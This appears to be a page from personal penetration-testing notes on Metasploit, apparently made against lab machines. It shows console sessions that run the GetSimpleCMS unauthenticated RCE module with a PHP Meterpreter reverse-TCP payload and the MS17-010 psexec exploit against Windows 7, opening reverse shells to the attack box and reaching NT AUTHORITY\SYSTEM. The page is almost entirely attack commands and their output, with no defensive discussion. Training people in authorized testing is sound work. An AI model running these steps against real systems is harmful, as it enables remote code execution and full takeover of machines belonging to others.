METASPLOIT

GitHub - rapid7/metasploit-framework: Metasploit FrameworkGitHub

SETUP

root@oco:~$ msfconsole
 ...


//Configure Target Settings
[msf](Jobs:0 Agents:0) >> search exploit "GetSimple CMS"

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/webapp/get_simple_cms_upload_exec    2014-01-04       excellent  Yes    GetSimpleCMS PHP File Upload Vulnerability
   1  exploit/multi/http/getsimplecms_unauth_code_exec  2019-04-28       excellent  Yes    GetSimpleCMS Unauthenticated RCE
 
[msf](Jobs:0 Agents:0) >> use 1
 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
 

[msf](Jobs:0 Agents:0) >> show options
 Module options (exploit/multi/http/getsimplecms_unauth_code_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the cms
   VHOST                       no        HTTP server virtual host

 Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  209.151.155.117  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


 Exploit target:

   Id  Name
   --  ----
   0   GetSimpleCMS 3.3.15 and before

[msf](Jobs:0 Agents:0) >> set RHOSTS 10.129.42.249
 RHOSTS => 10.129.42.249
 
[msf](Jobs:0 Agents:0) >> set RPORT 80
 RPORT => 80

//Configure Payloads
[msf](Jobs:0 Agents:0) >> set LHOST 10.10.14.57
 LHOST => 10.10.14.57

[msf](Jobs:0 Agents:0) >> set LPORT
 LPORT => 4444
  
[msf](Jobs:0 Agents:0) >> exploit
 [*] Started reverse TCP handler on 10.10.14.57:43213 
 [*] Sending stage (40004 bytes) to 10.129.42.249
 [*] Meterpreter session 1 opened (10.10.14.57:43213 -> 10.129.42.249:46344) at 2025-06-30 19:08:08 -0500

[msf](Jobs:0 Agents:0) >> search payload "shell_reverse"
 19   payload/generic/shell_reverse_tcp    normal     No     Generic Command Shell, Reverse TCP Inline

EXPLOITATION

root@oco:~$ msfconsole
msf6> search exploit smb
msf6> use exploit/windows/smb/ms17_010_psexec
msf6> show options
msf6> set RHOSTS 10.10.10.40
msf6> set LHOST tun0
msf6> exploit

 [*] Started reverse TCP handler on 10.10.14.2:4444 
 [*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
 [*] 10.10.10.40:445 - Built a write-what-where primitive...
 [+] 10.10.10.40:445 - Overwrite complete... SYSTEM session obtained!
 [*] 10.10.10.40:445 - Selecting PowerShell target
 [*] 10.10.10.40:445 - Executing the payload...
 [+] 10.10.10.40:445 - Service start timed out, OK if running a command or non-service executable...
 [*] Sending stage (175174 bytes) to 10.10.10.40
 [*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.40:49159) at 2020-12-27 01:13:28 +0000

meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 
meterpreter > shell
 Process 39640 created.
 Channel 0 created.
 Windows 7 Professional 7601 Service Pack 1
 (C) Copyright 1985-2009 Microsoft Corp.

C:\WINDOWS\system32>whoami
 NT AUTHORITY\SYSTEM

 * RHOSTS represents the target IP
 * LHOST represents the attack box

PreviousHAVOC C2 NextVPS

Last updated 1 month ago